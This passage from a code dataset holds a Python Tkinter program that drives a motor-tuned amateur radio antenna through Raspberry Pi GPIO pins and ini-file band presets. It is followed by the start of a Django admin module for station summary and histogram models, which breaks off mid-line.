+{"seq_id": "1587139047", "text": "#! /usr/bin/python3\n##################################################################\n#\n# Raspberry Pi Antenna Driver (RPiAntDrv.py)\n#\n# Python GUI script to control H-Bridge via RPi.\n# H-Bridge drives single DC motor tuned antenna.\n#\n# Name Call Date(s)\n# Authors: Bill Peterson N7IFC Mar-May2020\n#\n##################################################################\n\nfrom tkinter import Tk, ttk, messagebox, Frame, Menu, Label, Button\nfrom tkinter import Scale, IntVar, StringVar, Toplevel\nfrom tkinter import RAISED, HORIZONTAL, LEFT, S, W, SW, NW\nfrom pathlib import Path\nimport configparser\nimport RPi.GPIO as GPIO\n\nclass Window(Frame):\n # Define settings upon initialization\n def __init__(self, master=None):\n \n # parameters to send through the Frame class. \n Frame.__init__(self, master) \n \n #reference to the master widget, which is the tk window \n self.master = master\n \n # Retrieve parent script directory for absolute addressing\n self.base_path = Path(__file__).parent\n self.ini_path = str(self.base_path)+'/RPiAntDrv.ini'\n #print (self.ini_path)\n \n # Raspberry Pi I/O pins get reassigned when ini file is read\n self.pwm_freq = 4000 # PWM Freq in Hz\n self.pwm_duty = 0 # PWM Duty in percent, default to 0%\n self.stall_time = 250 # Motor stall time in mS\n \n self.encoder_count = IntVar() # Antenna reed switch count\n self.encoder_count.set(0)\n self.motor_running = False # Motor running flag\n self.motor_stalled = False # Motor stalled flag\n self.stall_active = False # Stall detection active\n self.stall_count = 0 # Encoder count during stall detection\n self.full_speed = 100 # Full speed PWM duty cycle\n self.slow_speed = 25 # Slow speed PWM duty cycle\n self.antenna_raising = False # Motor direction flag\n self.ant_config_sect = (\"null\") # Active ini file config section\n self.ant_preset_sect = (\"null\") # Active ini file preset section\n self.ant_preset_val = 0 # Preset encoder target value from ini presets\n self.status_message = StringVar() # Status message text for text_2\n \n # Run init_window, which doesn't yet exist\n self.init_window()\n \n #Creation of init_window\n def init_window(self):\n self.master.title('RPi Antenna Driver (v1.6)')\n # Set up root window & size (width x height + x_offset + y_offset)\n self.bg_color = 'azure'\n self.master.geometry(\"350x275+150+100\")\n self.master.configure(bg= self.bg_color)\n \n # Create menu entry and sub-options\n menubar = Menu(self.master)\n self.master.config(menu=menubar) \n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Open\", command=self.about)\n filemenu.add_command(label=\"Save\", command=self.about)\n filemenu.add_command(label=\"Save as...\", command=self.about)\n filemenu.add_separator()\n filemenu.add_command(label=\"Quit\", command=self.close)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n \n editmenu = Menu(menubar, tearoff=0)\n editmenu.add_command(label=\"Default ini\", command=self.confirm_newini)\n editmenu.add_command(label=\"Sync Count\", command=self.confirm_sync)\n editmenu.add_command(label=\"Undefined 2\", command=self.about)\n menubar.add_cascade(label=\"Edit\", menu=editmenu)\n \n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.about)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n \n text_1 = Label(textvariable=self.encoder_count, font = ('Helvetica', 30),\n bg = self.bg_color, fg='black', pady=5, height=1)\n text_1.grid(row=0, column=0, rowspan=2, pady=1, 
sticky=S)\n \n text_2 = Label(text='Status:', font = ('Helvetica', 14),\n bg = self.bg_color, fg='black', height=1,\n anchor=SW, width=22, justify=LEFT)\n text_2.grid(row=0, column=1, columnspan=1, sticky=SW)\n \n text_3 = Label(textvariable=self.status_message, font = ('Helvetica', 12),\n bg='white', fg='black', height=1, anchor=NW, width=22,\n borderwidth=1, relief=\"solid\")\n text_3.grid(row=1, column=1, sticky=NW)\n \n text_4 = Label(text='Motor Speed (%):', font = ('Helvetica', 14),\n bg = self.bg_color, fg='black', padx=1, height=1,\n anchor=SW, width=22, justify=LEFT)\n text_4.grid(row=2, column=1, columnspan=1, sticky=S)\n \n text_5 = Label(text='Antenna Selection:', font = ('Helvetica', 14),\n bg = self.bg_color, fg='black', padx=1, height=1,\n anchor=SW, width=22, justify=LEFT)\n text_5.grid(row=4, column=1, columnspan=1, sticky=S)\n \n text_6 = Label(text='Preset Selection:', font = ('Helvetica', 14),\n bg = self.bg_color, fg='black', padx=1, height=1,\n anchor=W, width=22, justify=LEFT)\n text_6.grid(row=6, column=1, columnspan=1, sticky=S)\n \n self.raise_button = Button(text='Raise', relief=RAISED, bd=4, padx=1,\n pady=1, height=2, width=6, font=('Helvetica', 14))\n self.raise_button.grid(row=2, column=0, padx=20, pady=5, rowspan=2)\n self.raise_button.bind(\"\", self.raise_button_press)\n self.raise_button.bind(\"\", self.RL_button_release)\n \n self.lower_button = Button(text='Lower', relief=RAISED, bd=4, padx=1,\n pady=1, height=2, width=6, font=('Helvetica', 14))\n self.lower_button.grid(row=4, column=0, padx=20, pady=5, rowspan=2)\n self.lower_button.bind(\"\", self.lower_button_press)\n self.lower_button.bind(\"\", self.RL_button_release)\n \n self.preset_button = Button(text='Preset', relief=RAISED, bd=4, padx=1,\n pady=1, height=2, width=6, font=('Helvetica', 14))\n self.preset_button.grid(row=6, column=0, padx=5, pady=5, rowspan=2)\n self.preset_button.bind(\"\", self.preset_button_press)\n \n self.duty_scale = Scale(from_=1, to=100, orient = HORIZONTAL,\n resolution = 1, length=200,\n command = self.update_pwm_duty)\n self.duty_scale.grid(row=3,column=1, sticky=NW)\n \n # Antenna preset combo box is populated with values from ini file\n self.antenna_combobox = ttk.Combobox(width=19, font=('Helvetica', 14),\n state='readonly')\n self.antenna_combobox.grid(row=5, column=1, sticky=NW)\n self.antenna_combobox.bind(\"<>\", self.get_antenna_val)\n \n # Antenna preset combo box is populated with values from ini file\n self.preset_combobox = ttk.Combobox(width=19, font=('Helvetica', 14),\n state='readonly')\n self.preset_combobox.grid(row=7, column=1, sticky=NW)\n self.preset_combobox.bind(\"<>\", self.get_preset_val)\n \n self.ini_test () # Check for ini file existence\n self.ini_read() # Retrieve ini file settings \n self.gpioconfig() # Set up GPIO for antenna control\n \n return\n \n def raise_button_press(self, _unused):\n self.motor_stalled = 0\n self.motor_up ()\n \n def lower_button_press(self, _unused):\n self.motor_stalled = 0\n self.motor_down ()\n \n def RL_button_release(self, _unused):\n self.motor_stop ()\n self.status_message.set (\"Ready\")\n \n def preset_button_press(self, _unused):\n self.motor_stalled = 0\n self.motor_move()\n \n def confirm_newini(self):\n okay = messagebox.askokcancel('RPiAntDrv',\n 'Overwrite Configuration File?',\n detail='This will overwrite the '\n 'RPiAntDrv.ini file with default '\n 'values.', icon='question')\n if okay:\n # Overwrite the ini file and refresh values\n self.ini_new()\n self.ini_read()\n self.status_message.set 
(\"RPiAntDrv.ini written\")\n else:\n self.status_message.set (\"Operation cancelled\")\n \n def confirm_sync(self):\n okay = messagebox.askokcancel('RPiAntDrv',\n 'Proceed with Sync?',\n detail='This will sychronize the '\n 'antenna encoder count to the preset '\n 'value selected.', icon='question')\n if okay:\n # Sychronize encoder count with current preset value\n self.encoder_count.set(self.ant_preset_val)\n self.status_message.set (\"Encoder syncronized\")\n else:\n self.status_message.set (\"Encoder sync canceled\")\n \n def motor_up(self):\n # We can change speed on the fly\n self.pwm_set.ChangeDutyCycle(self.pwm_duty)\n # If motor is not already running and in correct direction\n if not(self.motor_running and self.antenna_raising):\n # check reverse motor lead flag\n GPIO.output(self.dir1_pin, GPIO.HIGH) # Run motor FWD\n GPIO.output(self.dir2_pin, GPIO.LOW)\n self.antenna_raising = 1\n self.motor_running = 1\n # Initialize stall counter and start stall timer\n self.motor_stall()\n \n def motor_down(self):\n # We can change speed on the fly\n self.pwm_set.ChangeDutyCycle(self.pwm_duty)\n # If motor is not running and in correct direction\n if not(self.motor_running and not self.antenna_raising):\n GPIO.output(self.dir1_pin, GPIO.LOW) # Run motor\n GPIO.output(self.dir2_pin, GPIO.HIGH)\n self.motor_running = 1\n self.antenna_raising = 0\n # Initialize stall detection\n self.motor_stall()\n \n def motor_stop(self):\n GPIO.output(self.dir1_pin, GPIO.LOW) # Stop motor\n GPIO.output(self.dir2_pin, GPIO.LOW)\n self.pwm_set.ChangeDutyCycle(0) # Kill PWM\n self.motor_running = 0\n #self.ini_update()\n\n def motor_stall(self):\n # Set stall period proportional to motor speed\n self.stall_period = int((100 / self.duty_scale.get())* self.stall_time)\n # If motor is still running, perform stall check\n if (self.motor_running):\n # If stall detection is not already active\n if not(self.stall_active):\n self.stall_count = self.encoder_count.get()\n self.stall_active = 1\n self.master.after(self.stall_period, self.motor_stall)\n # Otherwise see if we stalled\n elif (self.stall_count == self.encoder_count.get()):\n self.motor_stalled = 1\n self.motor_stop()\n self.stall_active = 0\n self.status_message.set (\"! 
Antenna Stalled !\")\n # Else reset stall count and timer\n else:\n self.stall_count = self.encoder_count.get()\n self.master.after(self.stall_period, self.motor_stall)\n else:\n self.stall_active = 0\n \n def motor_move(self):\n # If motor is stalled, exit\n if (self.motor_stalled == 1):\n return\n # If encoder count = preset, stop and exit\n if self.encoder_count.get() == (self.ant_preset_val):\n self.motor_stop()\n self.status_message.set (\"We have arrived\")\n return\n # If encoder count within 5 counts of preset, slow down\n Lval= (self.ant_preset_val -5)\n Hval= (self.ant_preset_val +6)\n if self.encoder_count.get() in range(Lval, Hval):\n self.status_message.set (\"Slowing down\")\n self.duty_scale.set(self.slow_speed)\n # Else run full speed \n else:\n self.status_message.set (\"Full speed\")\n self.duty_scale.set(self.full_speed)\n \n # If encoder count > preset drive antenna down\n if self.encoder_count.get() > (self.ant_preset_val):\n self.motor_down()\n # Else drive antenna up\n else:\n self.motor_up()\n # after 100mS, call this function again\n self.master.after(100, self.motor_move)\n \n def get_antenna_val(self, _unused):\n # fetch new antenna configuration and presets\n config = configparser.ConfigParser()\n config.read (self.ini_path)\n self.last_antenna = self.antenna_combobox.get()\n self.ant_refresh(config)\n self.pwm_set.ChangeFrequency(self.pwm_freq)\n \n def get_preset_val(self, _unused):\n # get the preset value stored in the ini file\n config = configparser.ConfigParser()\n config.read (self.ini_path)\n self.ant_preset_val = (config.getint(self.ant_preset_sect,\n self.preset_combobox.get()))\n #print (self.ant_preset_val)\n \n def update_pwm_duty(self, _unused):\n self.pwm_duty = self.duty_scale.get()\n #print (_unused)\n \n def gpioconfig(self): # Configure GPIO pins\n GPIO.setwarnings(False)\n GPIO.cleanup() # In case user changes running configuration\n \n GPIO.setmode(GPIO.BOARD) # Refer to IO as Board header pins\n GPIO.setup(self.dir1_pin, GPIO.OUT) # Direction output 1 to H-bridge\n GPIO.setup(self.dir2_pin, GPIO.OUT) # Direction output 2 to H-bridge\n GPIO.output(self.dir1_pin, GPIO.LOW) # Turn direction output 1 off\n GPIO.output(self.dir2_pin, GPIO.LOW) # Turn direction output 2 off\n GPIO.setup(self.pwm_pin, GPIO.OUT) # PWM output to H-bridge\n # Set up the simple encoder switch input and add de-bounce time in mS\n # GPIO.RISING interrupts on both edges, GPIO.FALLING seems better behaved\n GPIO.setup(self.encoder_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n GPIO.add_event_detect(self.encoder_pin, GPIO.FALLING,\n bouncetime=40, callback=self.encoder_ISR)\n # Note GPIO.PWM is software not hardware PWM\n self.pwm_set = GPIO.PWM(self.pwm_pin, self.pwm_freq) # Set up PWM for use\n #self.pwm_set.stop() # Stop pwm output\n self.pwm_set.start(self.pwm_duty) # Start pwm output at 0%\n \n GPIO.setwarnings(True)\n \n def encoder_ISR(self, _channel):\n # Do as little as possible in the ISR, get in and get out!\n # Increment the encoder count and jump out\n if self.antenna_raising == 1:\n self.encoder_count.set (self.encoder_count.get()+1)\n else:\n self.encoder_count.set (self.encoder_count.get()-1)\n \n def ini_new(self): # Set up an ini file if it does not exist\n # Configuration file parser to read and write ini file\n config = configparser.ConfigParser()\n # User configurable program settings\n config['Settings'] = {'pwm_pin':'19',\n 'dir1_pin':'13',\n 'dir2_pin':'15',\n 'encoder_pin':'11',\n 'antennas':'Antenna 1, Antenna 2', \n 'last_position':'0',\n 
'last_antenna':'Antenna 1',\n 'last_preset':'20m 14.400 (037)'}\n \n # Set up default antennas\n config['Antenna 1_Config'] = {'pwm_freq':'4000',\n 'full_speed':'100',\n 'slow_speed':'25',\n 'stall_time':'250'}\n \n config['Antenna 1_Preset'] = {'maximum (270)':'270',\n '80m _3.500 (226)':'226',\n '80m _3.580 (221)':'221',\n '80m _3.800 (206)':'206',\n '80m _3.900 (199)':'199',\n '80m _4.000 (192)':'192',\n '60m _5.300 (130)':'130',\n '60m _5.400 (127)':'127',\n '40m _7.035 (091)':'91',\n '40m _7.175 (089)':'89',\n '40m _7.300 (087)':'87',\n '30m 10.000 (056)':'56',\n '30m 10.100 (055)':'55',\n '30m 10.200 (054)':'54',\n '20m 14.000 (039)':'39',\n '20m 14.200 (038)':'38',\n '20m 14.400 (037)':'37',\n '15m 21.275 (019)':'19',\n '12m 24.930 (014)':'14',\n '10m 28.000 (008)':'8',\n '10m 29.700 (006)':'6',\n 'minimum (000)':'0'} \n \n config['Antenna 2_Config'] = {'pwm_freq':'4000',\n 'full_speed':'95',\n 'slow_speed':'20',\n 'stall_time':'250'}\n \n config['Antenna 2_Preset'] = {'maximum (270)':'270',\n '80m _3.700 (200)':'200',\n '60m _5.350 (129)':'129',\n '40m _7.250 (090)':'90',\n '30m 10.100 (055)':'55',\n '20m 14.200 (038)':'38',\n 'minimum (000)':'0'}\n \n # Save the default configuration file\n with open(self.ini_path, 'w') as configfile:\n config.write(configfile)\n \n def ini_test(self):\n # Test to see if configuration file exists\n try:\n with open(self.ini_path) as _file:\n # pass condition\n self.status_message.set (\"Configuration file loaded\")\n except IOError as _e:\n #Does not exist OR no read permissions\n self.status_message.set (\"Configuration file created\")\n self.ini_new ()\n \n def ini_read(self):\n # Read ini file and set up parameters\n config = configparser.ConfigParser()\n config.read (self.ini_path)\n # Retrieve I/O pin assignments\n self.pwm_pin = (config.getint ('Settings','pwm_pin',fallback=19))\n self.dir1_pin = (config.getint ('Settings','dir1_pin',fallback=13))\n self.dir2_pin = (config.getint ('Settings','dir2_pin',fallback=15))\n self.encoder_pin = (config.getint ('Settings','encoder_pin',fallback=11))\n # Restore the encoder count to preset value\n self.encoder_count.set (config.getint('Settings','last_position',fallback=0))\n self.ant_preset_val = self.encoder_count.get() \n # Retrieve the last antenna used and restore saved state\n # Grab CSV list of antennas to act as combobox values and keys\n # The .strip method removes leading and trailing spaces from .split list\n _antennas = (config.get('Settings','antennas',fallback=\"Antenna 1\"))\n self.antenna_combobox['values']=[item.strip() for item in _antennas.split(',')] \n self.last_antenna = (config.get('Settings','last_antenna',fallback=\"Antenna 1\"))\n self.antenna_combobox.set(self.last_antenna)\n self.preset_combobox.set(config.get('Settings','last_preset',fallback='None'))\n \n # refresh antenna settings and presets\n self.ant_refresh(config)\n \n def ant_refresh (self,config):\n # Using selected antenna refresh antenna settings and presets\n self.ant_config_sect = (self.last_antenna + '_Config')\n self.ant_preset_sect = (self.last_antenna + '_Preset')\n self.pwm_freq = (config.getint (self.ant_config_sect,'pwm_freq',fallback=4000))\n self.full_speed = (config.getint (self.ant_config_sect,'full_speed',fallback=100))\n self.slow_speed = (config.getint (self.ant_config_sect,'slow_speed',fallback=25))\n self.stall_time = (config.getint (self.ant_config_sect,'stall_time',fallback=250))\n self.preset_combobox['values']=(config.options(self.ant_preset_sect))\n \n def ini_update(self):\n config = 
configparser.ConfigParser()\n # Perform read-modify-write of ini file\n # Note: Anytyhing written must be a string value\n config.read (self.ini_path)\n config.set ('Settings','last_position',str(self.encoder_count.get()))\n config.set ('Settings','last_antenna',self.antenna_combobox.get())\n config.set ('Settings','last_preset',self.preset_combobox.get()) \n # Save modified configuration file\n with open(self.ini_path, 'w') as configfile:\n config.write(configfile)\n self.status_message.set (\"ini file updated\")\n \n def close(self): # Cleanly close the GUI and cleanup the GPIO\n self.ini_update() # Save current settings\n GPIO.cleanup()\n #print (\"GPIO cleanup executed\") \n self.master.destroy()\n #print (\"master window destroyed\")\n \n def about(self):\n popup = Toplevel()\n popup.title(\"About RPiAntDrv\")\n popup.geometry(\"325x225+162+168\")\n popup.configure(bg= 'snow')\n \n popup_text1 = Label(popup, text='RPiAntDrv.py v1.6',\n font = ('Helvetica', 12), wraplength=300, justify=LEFT,\n bg = 'snow', fg='black', padx=10, pady=10)\n popup_text1.grid(row=0, column=0, columnspan=1)\n \n popup_text2 = Label(popup, text='This Python script is used to control '\n 'a motor tuned antenna like a screwdriver antenna or '\n 'tuned loop. Feedback from the antenna is provided by '\n 'a simple dry contact or pulse output relative to the '\n 'output shaft turning.',\n font = ('Helvetica', 12), wraplength=300, justify=LEFT,\n bg = 'snow', fg='black', padx=10, pady=10)\n popup_text2.grid(row=1, column=0, columnspan=1)\n \n popup.mainloop()\n \ndef main():\n \n # root window created. Here, that would be the only window, but\n # you can later have windows within windows.\n root = Tk()\n app = Window(root) #creation of an instance\n root.protocol(\"WM_DELETE_WINDOW\", app.close) # cleanup GPIO when X closes window\n root.mainloop() # Loops forever\n \nif __name__ == '__main__':\n main()\n ", "repo_name": "N7IFC/RPi_Antenna_Driver", "sub_path": "RPiAntDrv.py", "file_name": "RPiAntDrv.py", "file_ext": "py", "file_size_in_byte": 23504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.Frame", "line_number": 21, "usage_type": "name"}, {"api_name": "tkinter.Frame.__init__", "line_number": 26, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 26, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 41, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 67, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 69, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 77, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 83, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 87, "usage_type": "call"}, {"api_name": "tkinter.S", "line_number": 89, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 91, "usage_type": "call"}, {"api_name": "tkinter.SW", "line_number": 93, "usage_type": "name"}, {"api_name": "tkinter.LEFT", "line_number": 93, "usage_type": "name"}, {"api_name": "tkinter.SW", "line_number": 94, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 96, "usage_type": "call"}, {"api_name": "tkinter.NW", "line_number": 97, "usage_type": "name"}, {"api_name": "tkinter.NW", "line_number": 99, "usage_type": "name"}, {"api_name": 
"tkinter.Label", "line_number": 101, "usage_type": "call"}, {"api_name": "tkinter.SW", "line_number": 103, "usage_type": "name"}, {"api_name": "tkinter.LEFT", "line_number": 103, "usage_type": "name"}, {"api_name": "tkinter.S", "line_number": 104, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 106, "usage_type": "call"}, {"api_name": "tkinter.SW", "line_number": 108, "usage_type": "name"}, {"api_name": "tkinter.LEFT", "line_number": 108, "usage_type": "name"}, {"api_name": "tkinter.S", "line_number": 109, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 111, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 113, "usage_type": "name"}, {"api_name": "tkinter.LEFT", "line_number": 113, "usage_type": "name"}, {"api_name": "tkinter.S", "line_number": 114, "usage_type": "name"}, {"api_name": "tkinter.Button", "line_number": 116, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 116, "usage_type": "name"}, {"api_name": "tkinter.Button", "line_number": 122, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 122, "usage_type": "name"}, {"api_name": "tkinter.Button", "line_number": 128, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 128, "usage_type": "name"}, {"api_name": "tkinter.Scale", "line_number": 133, "usage_type": "call"}, {"api_name": "tkinter.HORIZONTAL", "line_number": 133, "usage_type": "name"}, {"api_name": "tkinter.NW", "line_number": 136, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 139, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 139, "usage_type": "name"}, {"api_name": "tkinter.NW", "line_number": 141, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 145, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 145, "usage_type": "name"}, {"api_name": "tkinter.NW", "line_number": 147, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askokcancel", "line_number": 173, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 173, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askokcancel", "line_number": 187, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 187, "usage_type": "name"}, {"api_name": "RPi.GPIO.output", "line_number": 205, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 205, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 205, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 206, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 206, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 206, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 217, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 217, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 217, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 218, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 218, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 218, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 225, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 225, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 225, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 226, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 226, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", 
"line_number": 226, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 285, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 293, "usage_type": "call"}, {"api_name": "RPi.GPIO.setwarnings", "line_number": 304, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 304, "usage_type": "name"}, {"api_name": "RPi.GPIO.cleanup", "line_number": 305, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 305, "usage_type": "name"}, {"api_name": "RPi.GPIO.setmode", "line_number": 307, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 307, "usage_type": "name"}, {"api_name": "RPi.GPIO.BOARD", "line_number": 307, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 308, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 308, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 308, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 309, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 309, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 309, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 310, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 310, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 310, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 311, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 311, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 311, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 312, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 312, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 312, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 315, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 315, "usage_type": "name"}, {"api_name": "RPi.GPIO.IN", "line_number": 315, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PUD_UP", "line_number": 315, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.add_event_detect", "line_number": 316, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 316, "usage_type": "name"}, {"api_name": "RPi.GPIO.FALLING", "line_number": 316, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PWM", "line_number": 319, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 319, "usage_type": "name"}, {"api_name": "RPi.GPIO.setwarnings", "line_number": 323, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 323, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 335, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 405, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 438, "usage_type": "call"}, {"api_name": "RPi.GPIO.cleanup", "line_number": 452, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 452, "usage_type": "name"}, {"api_name": "tkinter.Toplevel", "line_number": 458, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 463, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 464, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 468, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 473, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 483, "usage_type": "call"}]}
+{"seq_id": "5523461716", "text": "from django.contrib import admin\n\nfrom . import models\n\n\n@admin.register(models.GeneratorState)\nclass GeneratorStateAdmin(admin.ModelAdmin):\n list_display = ('check_last_run', 'check_is_running', 'update_last_run', 'update_is_running')\n\n\n@admin.register(models.NetworkHistogram)\nclass NetworkHistogramAdmin(admin.ModelAdmin):\n list_display = ('network_summary', 'type')\n list_filter = ('type', 'network_summary__date')\n raw_id_fields = ('network_summary',)\n\n\n@admin.register(models.DailyHistogram, models.MultiDailyHistogram, models.DailyDataset, models.MultiDailyDataset)\nclass DailyStationDataAdmin(admin.ModelAdmin):\n list_display = ('summary', 'type')\n list_filter = ('type', 'summary__station__number')\n raw_id_fields = ('summary',)\n\n\nclass DailyHistogramInline(admin.StackedInline):\n model = models.DailyHistogram\n extra = 0\n\n\nclass MultiDailyHistogramInline(admin.StackedInline):\n model = models.MultiDailyHistogram\n extra = 0\n\n\nclass DailyDatasetInline(admin.StackedInline):\n model = models.DailyDataset\n extra = 0\n\n\nclass MultiDailyDatasetInline(admin.StackedInline):\n model = models.MultiDailyDataset\n extra = 0\n\n\nclass NetworkHistogramInline(admin.StackedInline):\n model = models.NetworkHistogram\n extra = 0\n\n\n@admin.register(models.NetworkSummary)\nclass NetworkSummaryAdmin(admin.ModelAdmin):\n list_display = (\n 'date',\n 'needs_update',\n 'needs_update_coincidences',\n 'num_coincidences',\n )\n list_filter = ('needs_update', 'needs_update_coincidences', 'date')\n list_editable = ('needs_update', 'needs_update_coincidences')\n inlines = (NetworkHistogramInline,)\n list_per_page = 200\n actions = ['unset_update_flag', 'unset_coincidences_flag', 'set_update_flag', 'set_coincidences_flag']\n\n def unset_update_flag(self, request, qs):\n qs.update(needs_update=False)\n\n unset_update_flag.short_description = 'Unset needs_update'\n\n def unset_coincidences_flag(self, request, qs):\n qs.update(needs_update_coincidences=False)\n\n unset_coincidences_flag.short_description = 'Unset needs_update_coincidences'\n\n def set_update_flag(self, request, qs):\n qs.update(needs_update=True)\n\n set_update_flag.short_description = 'Set needs_update'\n\n def set_coincidences_flag(self, request, qs):\n \"\"\"Only set flags if num coincidences is not null\"\"\"\n (qs.filter(num_coincidences__isnull=False).update(needs_update_coincidences=True))\n\n set_coincidences_flag.short_description = 'Set needs_update_coincidences'\n\n\n@admin.register(models.Summary)\nclass SummaryAdmin(admin.ModelAdmin):\n list_display = (\n 'station',\n 'date',\n 'num_events',\n 'num_config',\n 'num_errors',\n 'num_weather',\n 'num_singles',\n 'needs_update',\n 'needs_update_events',\n 'needs_update_config',\n 'needs_update_errors',\n 'needs_update_weather',\n 'needs_update_singles',\n )\n list_filter = (\n 'station',\n 'needs_update',\n 'needs_update_events',\n 'needs_update_weather',\n 'needs_update_singles',\n 'needs_update_config',\n 'date',\n )\n list_editable = (\n 'needs_update',\n 'needs_update_events',\n 'needs_update_weather',\n 'needs_update_singles',\n 'needs_update_config',\n )\n inlines = (DailyHistogramInline, MultiDailyHistogramInline, DailyDatasetInline, MultiDailyDatasetInline)\n list_per_page = 200\n actions = [\n 'unset_update_flag',\n 'unset_events_flag',\n 'unset_config_flag',\n 'set_update_flag',\n 'set_events_flag',\n 'set_config_flag',\n ]\n\n def unset_update_flag(self, request, qs):\n qs.update(needs_update=False)\n\n 
unset_update_flag.short_description = 'Unset needs_update'\n\n def unset_events_flag(self, request, qs):\n qs.update(needs_update_events=False)\n\n unset_events_flag.short_description = 'Unset needs_update_events'\n\n def unset_config_flag(self, request, qs):\n qs.update(needs_update_config=False)\n\n unset_config_flag.short_description = 'Unset needs_update_config'\n\n def set_update_flag(self, request, qs):\n qs.update(needs_update=True)\n\n set_update_flag.short_description = 'Set needs_update'\n\n def set_events_flag(self, request, qs):\n \"\"\"Only set flags if num events is not null\"\"\"\n qs.filter(num_events__isnull=False).update(needs_update_events=True)\n\n set_events_flag.short_description = 'Set needs_update_events'\n\n def set_config_flag(self, request, qs):\n \"\"\"Only set flags if num config is not null\"\"\"\n qs.filter(num_config__isnull=False).update(needs_update_config=True)\n\n set_config_flag.short_description = 'Set needs_update_config'\n\n\n@admin.register(models.Configuration)\nclass ConfigurationAdmin(admin.ModelAdmin):\n list_display = ('station', 'primary', 'secondary', 'timestamp')\n list_filter = 